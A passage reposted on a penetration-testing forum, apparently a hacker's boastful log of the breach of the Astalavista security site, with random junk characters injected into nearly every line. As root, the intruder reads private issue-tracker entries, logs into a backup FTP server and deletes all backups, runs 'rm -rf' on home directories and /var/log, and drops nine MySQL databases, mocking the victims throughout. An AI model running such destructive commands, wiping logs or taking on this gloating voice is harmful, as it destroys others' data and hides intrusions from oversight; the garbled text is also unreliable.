ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
2 N9 z* \; i6 Z" g3 F
. d; c$ A/ [! b, A* H5 UOne example a friend of mine from coresecurity.com!/ w/ A8 V% J. o* i2 H3 i. C4 q

8 w" y8 A8 V1 v9 s7 @We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..7 B# T, G0 [" i& ^' M
8 H/ i9 b$ {- G) Y3 X' T7 O  m
|
8 b2 z  [9 {7 w7 l$ o8 v8 t- b/ a+————————+——————————————————————————————————————————————————————————————————————————————+
7 G1 a1 I. T: C9 p% X; X# _1 row in set (0.00 sec)
6 v. j+ {; ~% a& [( ?( I) X  o4 S3 B: s6 s# v' i! }6 _5 q
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…7 ~) C) @$ R' g0 @
2 }: p# z% U# n8 B9 x' x
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
3 e' I6 ?) S* R0 o! y+——————+———————————————————————————————+
# A+ r% T' |6 n# w1 ?: G) ~| iss_summary      | iss_description                                                                             |
8 }$ l, u. y. @) h. R+——————+———————————————————————————————+
. d: x  x$ H" E$ R6 U" _& c| Website guidance | Virtual Girl which guides you trought the website.
  n3 _7 k* c6 j$ |9 R
  J6 E/ e' U3 w1 h5 y: CWe need a girl with who you can ( talk )!!!
* G" I1 Q: A1 r: F; u! x% V$ e" sAlso for the News!! z1 e+ @; g  L9 b2 w- U* G3 K
So my suggestion is a girl who read you the news loud if you like!
4 z0 q  r# V  A8 r5 l5 H% fyou can choose between read yourselfe or she read it for you or both!- w( [/ r/ ?9 }% o" X
1 G( s& `: D" K5 n% q: g
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!1 \  {% V' W+ u5 H8 ]1 o" {2 L

; k# F4 u* s. G. B! H; JHave a look on the example girls!!7 \* B- [; s5 s2 N, k8 x1 p

* o+ e. D9 a( f* s0 P链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
( d. h6 L6 f9 }. F& p7 U4 H" A* r1 M; w
or that
9 y; G6 M# ~' o# W2 m% B
. M2 @7 ~8 q8 F5 b链接标记[url]http://www.yellostrom.de/[/url]' d* w0 w2 s: t, J4 j

9 ]* M' \; s6 }|' I' Q, X- g3 [2 W& U
+——————+———————————————————————————————+
. Q4 C3 c$ r0 m+ C* `& q0 x1 row in set (0.00 sec)6 s$ N' K2 N) u! v

: E* k5 a/ e6 E- s; c, e// ha ha.- C8 o( y# L& J
# _  S; V4 v4 |# x! Z& B0 i
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
2 k5 O4 O* W. r* b+————————–+———————————————————————————————————–+
& j! `# k6 ^6 e# I! f| iss_summary              | iss_description                                                                                           |
; V* I4 q( `% i9 X1 w* |+————————–+———————————————————————————————————–+
  S/ {! G, _0 Q| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |, A* P  C% x+ ^& [$ N7 ?" G
+————————–+———————————————————————————————————–+% B8 [# d" v3 I9 u' L" n
1 row in set (0.00 sec)& x! K3 \% [9 H* Z- s* p

5 B$ H* F; d5 ^" {8 I// LOL.
' w" l& l$ v& F' S3 ^, ?6 y6 M- N" ?# `1 e$ |' m8 k3 f
mysql> exit% W" ~0 P7 |2 F- k( E- y
Bye
" Z: a3 C. P( U2 i* o! b$ q* S. q
sh-3.2# ftp 212.254.194.163
# |. M, w- A9 p( w& G$ lConnected to 212.254.194.163.2 p, Q3 }6 R4 q+ h+ U5 d
220 BackupCOM_VW FTP server ready.
. o, X! b8 |  ~' G5 \/ K2 Z" `504 AUTH: security mechanism ‘GSSAPI’ not supported.1 s- E  I  H( f" w' ]: H8 L* s( b
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.4 k( d5 b! y* ~9 e
KERBEROS_V4 rejected as an authentication type
* I' t. V- v% u5 t2 l5 _' `% _Name (212.254.194.163:root): astalavista.com
: N6 I! L2 q0 O331 Password required for astalavista.com.
! E& |; x& S7 s# s3 kPassword:# s% Z# F; R# g
230 User astalavista.com logged in.
, D; `4 j% j& r! W5 iRemote system type is UNIX.# c9 h5 B2 J2 o/ n3 ^
Using binary mode to transfer files.. x+ b. n( [. e0 I/ H, c
ftp> ls -la& \/ x' j5 ?1 i: ?( Z( N) \
227 Entering Passive Mode (212,254,194,163,2,188)9 h0 p. N! f$ g7 A/ g
150 Opening BINARY mode data connection for ‘file list’.
3 }: z3 D+ }' C* ddr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
" w2 V! f: S& n+ s226 Transfer complete.
0 ^8 r3 z9 T9 ?" cftp> cd astalavista.com" X9 f9 v: k9 d9 r# `  _
250 CWD command successful.
! v2 e  v) ]7 Z+ x; |& \7 kftp> ls -la' a: }1 G# l% ^, W5 E& }
227 Entering Passive Mode (212,254,194,163,2,189)
/ R4 j5 `. U% N1 j/ }150 Opening BINARY mode data connection for ‘file list’.+ @* T' M; ?6 l& a4 p
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar  C5 k6 E; b+ W# {7 }2 P6 a
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2) k8 @1 i" G( T/ A+ Y
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
( |! R' K9 E* C% J4 k; F! C-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
# t7 m4 Z0 \5 Y-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
. p& a- J' E7 P9 p: z7 u# ][snip], w" `6 i/ k9 d
226 Transfer complete.
: Z) Y, Y7 Q# }ftp> mdelete *6 c0 v# g. L* f$ W; G' D: Y: n
ftp> ls -la
0 ?5 d- [: x- k227 Entering Passive Mode (212,254,194,163,2,193)
- s1 a: `8 p* A" X9 t- t; m' ]150 Opening BINARY mode data connection for ‘file list’.
) r5 l8 Q" i( P! S1 M& ^226 Transfer complete.  |5 L- V) w7 d$ i( O
ftp>) A. E: a) D+ I, c) Y

, J4 ^0 a' i- u) e8 Bsh-3.2# cd /home2 \. [, H9 a- b' J6 Z3 g, G
sh-3.2# ls -la
! M9 a2 K  |0 S! Ktotal 120
5 Y& g) D9 [" h; ldrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .9 W; ~4 k! o% s; d/ |, K
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..; `4 {) @. u- K9 W0 k( O
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
2 q& R% p( _( A-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
$ L  K- m" T+ @-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user* M  g0 ^8 F5 s1 G; Q7 W
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet/ W, M( V1 \! S) R- G
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup# C: u; P: V. J! I9 _
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161. Z) y) s- B! ~9 f& J
drwx–x–x 10 com     com      4096 Apr 28 12:40 com
$ S2 A9 I/ ]3 C# S: ?' adrwxr-xr-x  2 root    root     4096 May 17  2007 ftp- W$ Z8 Z0 P2 A+ G; L, B% M
drwx——  3 jon     jon      4096 Sep 21  2007 jon
) `& O- ]1 Z/ J; Wdrwx——  2 root    root    16384 Sep 11  2007 lost+found3 c. h/ A6 u/ G) M: ^
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
$ }$ F" O& ~7 {2 x. K+ g# Ddrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
' ~3 v# X) [- k2 t( Wdrwx——  2 jon     jon      4096 Sep 15  2007 test
9 s& ?) s9 y- e: D' edrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
4 G" s( S& h! _4 M: S1 `
2 ~; k5 k! g* R$ B+ A) W1 jsh-3.2# rm -rf backup/  V/ b$ ~; o" E( v1 L
sh-3.2# rm -rf backup.14161/
7 F- P5 {5 h+ y+ y$ M  \8 P: j7 vsh-3.2# rm -rf ftp/3 N6 n. k& i' u" F) S0 w
sh-3.2# rm -rf jon/) ]$ |; `/ n+ u+ f. R
sh-3.2# rm -rf my/
; G5 W# Q. x' d! L: S3 Y+ xsh-3.2# rm -rf mysqldata/
5 d. M) d6 ]/ dsh-3.2# rm -rf test/4 \* r5 Y; B6 I! g: R* j% G& s" Z
sh-3.2# rm -rf tmp/- r) F/ q6 h& q
sh-3.2# cd ~4 m6 |* L1 w7 @( ]8 k5 a/ g
sh-3.2# rm -rf *1 k- T4 U2 k/ B4 y: [3 ~
sh-3.2# rm -rf /var/log/) w8 N( J9 M2 x2 g! x
rm: cannot remove directory `/var/log//proftpd’: Directory not empty  q6 t) P2 d1 b. E
sh-3.2# rm -rf /home/*' d2 S% b0 b- ^1 t+ f
sh-3.2# mysql1 L+ o7 Y1 v2 D+ L* k
Welcome to the MySQL monitor.  Commands end with ; or \g.
' [) x- b/ z2 e1 |' k7 a+ `5 ]# M4 C$ EYour MySQL connection id is 407156
. a8 |* }8 l) z% k  b% |Server version: 5.0.45-community-log MySQL Community Edition (GPL)
: Y$ @* u/ Q) ]& V) q& ^% T" t
& y& O4 r. ^2 M* O0 B& w9 a9 J# T) dType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.- @- q- d0 J0 t* c, w; M! @
9 z2 M. G! M- d; F& {
mysql> show databases;
  R& ?3 I) ?, O( j+———————–+
% v; f/ E9 ?8 B( a: w* y" _| Database              |
# U1 ?7 H" c. x) f& C+ h* T. l+———————–+  r, e. ~' G' Z6 G: }( d; v
| information_schema    |
9 L( w$ @2 y, D| astanet_ads           |
: l- r+ A- y! z. @0 Y| astanet_mailing_lists |
! K0 l' ~+ L3 t6 I: h* R1 c" w4 L| astanet_mediawiki     |$ p7 B4 I7 \$ i7 d* S* O# P& y
| astanet_membersystem  |
. k& @: S* k) Y8 H+ X/ j| com_contrexx          |
; f& E# k* z" Q! A0 S" s| com_contrexx2         |$ n0 i  R& o- R) O
| com_contrexx2_live    |
, r! Q! d2 }  s4 ^3 k( G| da_roundcube          |
3 X/ p) }) g: o" H) \6 ?" D| dolphin               |  l0 N& x0 X6 v! I# H& D
| ideapool              |& a1 E* A( r  L) b# n9 ]
| mysql                 |
6 M& r6 G. d/ v4 i1 W$ N| test                  |
: Z; V+ d2 c3 [: E, B| yourmaster            |
, F4 n1 [9 |, S% J+———————–+
5 {, I- ]0 B  y9 C* ^  p14 rows in set (0.03 sec)/ V# [$ _, L, [- d

7 t- @9 ]2 \+ `+ I0 R( P( L4 P; kmysql> drop database astanet_membersystem;
! ^; {8 w* h1 ^2 u8 NdroQuery OK, 46 rows affected (0.81 sec)7 b# Y- x6 f. D" u0 l4 o7 m
0 B* l4 w) T5 k  H) k
mysql> drop database com_contrexx;
4 o" T# r" `: V: _. g( d# |Query OK, 211 rows affected (2.72 sec)
9 j) b1 \+ q; t; {1 i% H! V$ R, z9 b) I" \1 k4 q6 c. M
mysql> drop database com_contrexx2;4 {. q6 J3 V0 m/ t
Query OK, 237 rows affected (2.23 sec)
* C! L: c+ _9 k3 x
3 t8 X4 g8 `) G5 m- lmysql> drop database com_contrexx2_live;) T3 [+ q7 Z  J- @& z0 J. T0 s
Query OK, 227 rows affected (7.63 sec)8 A. W* V. S" m- S0 u7 o
( O+ z- H! j0 I7 L" {. D& l0 z4 R
mysql> drop database ideapool;) P7 F; N5 c3 q" O% L2 y
Query OK, 69 rows affected (0.19 sec)# A! \+ P8 g# e

8 u; t& |* u! V8 o( Q$ c$ l* J" N4 hmysql> drop database yourmaster;
$ j, ~) n# v& h" f% @! N* {Query OK, 158 rows affected (0.55 sec)% Z3 [& _8 o" C

& y- b8 X8 Y: Y5 c! N. w2 K" Nmysql> drop database astanet_ads;3 s  _# `, \. L8 ~* t, H) Q
Query OK, 9 rows affected (0.11 sec)
# B+ ~% q; v$ [( d( p- o9 p
1 V3 @4 i' v' ^* E! i4 o! C8 ?mysql> drop database astanet_mailing_lists;. p, a: ]: i' q# P, }% ^
Query OK, 24 rows affected (1.47 sec)
. x8 R% D  o" W0 n+ G# F: q3 J
+ W6 `$ n4 o! ~) ^9 ]. rmysql> drop database astanet_mediawiki;+ l7 T9 R6 N+ s; Z
Query OK, 31 rows affected (0.51 sec)# \. _: ^8 e; ^) e1 Y7 V
8 w6 M% j$ d0 ]) ?
mysql> show databases;
1 f9 H. K* p1 h  s4 J+——————–+) ^. u1 A8 I) G- u, ?% j
| Database           |$ q/ S4 U+ y# O% P
+——————–+
0 e5 t8 k. D. p| information_schema |% A* [5 c- c% P  K7 e
| da_roundcube       |6 D! _6 C3 G3 G
| dolphin            |" j0 x+ E& p0 R( Y; n
| mysql              |& q+ r) O0 T# N6 R
| test               |
$ t* E. y- T1 O, k+——————–+
- m) p$ w+ H( b& t+ b5 rows in set (0.00 sec)
% H1 Q* t8 ~) J" Y, }
' N! ~; R" y( f1 z) SWhat a journey! We’re not sure exactly why the “Terminator” had any influence on: |! {7 c( s/ |& y; V
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
7 O8 a0 J' ]0 C7 `* N! y" dwrong to say this pack of morons *wont be back*.5 S; w# u) |" A- F# v1 I3 O





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2